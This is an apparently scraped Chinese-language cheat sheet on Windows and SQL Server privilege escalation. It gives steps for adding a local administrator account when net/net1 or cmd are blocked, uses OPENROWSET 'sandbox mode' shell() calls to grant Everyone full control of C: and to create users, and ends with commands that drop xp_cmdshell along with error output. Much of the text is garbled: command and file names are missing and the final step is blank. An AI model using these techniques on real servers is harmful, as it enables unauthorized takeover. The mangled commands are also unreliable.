2024年3月9日发(作者:)

net net1被禁止时执行CMD命令

第一步:dir /s /p 或者 dir /s /p

第二步:C: user 123 123 /add

第三步:C: localgroup administrators

123 /add

◆◆◆◆◆◆◆◆◆◆◆◆◆◆

沙盘模式提权

禁止

select * from

openrowset('.4.0',';database=c:

','select shell("cacls c: /e /t /g everyone:F')

net net1都被禁用

select * from

openrowset('.4.0',';database=c:

','select shell("xcopy /y")')

如果cmd被禁用

select * from

openrowset('.4.0',';database=c:

','select shell("net user user pass /add")')

◆◆◆◆◆◆◆◆◆◆◆◆◆◆

除了其他的都可以用这命令修复

第一步先删除:

drop procedure sp_addextendedproc

drop procedure sp_oacreate

exec sp_dropextendedproc 'xp_cmdshell'

服务器: 消息 3701,级别 11,状态 5,行 1

无法 除去 过程 'sp_addextendedproc',因为它在系统目录中不存在。

服务器: 消息 3701,级别 11,状态 5,过程 sp_dropextendedproc,行 18

无法 除去 过程 'xp_cmdshell',因为它在系统目录中不存在。

第二步恢复: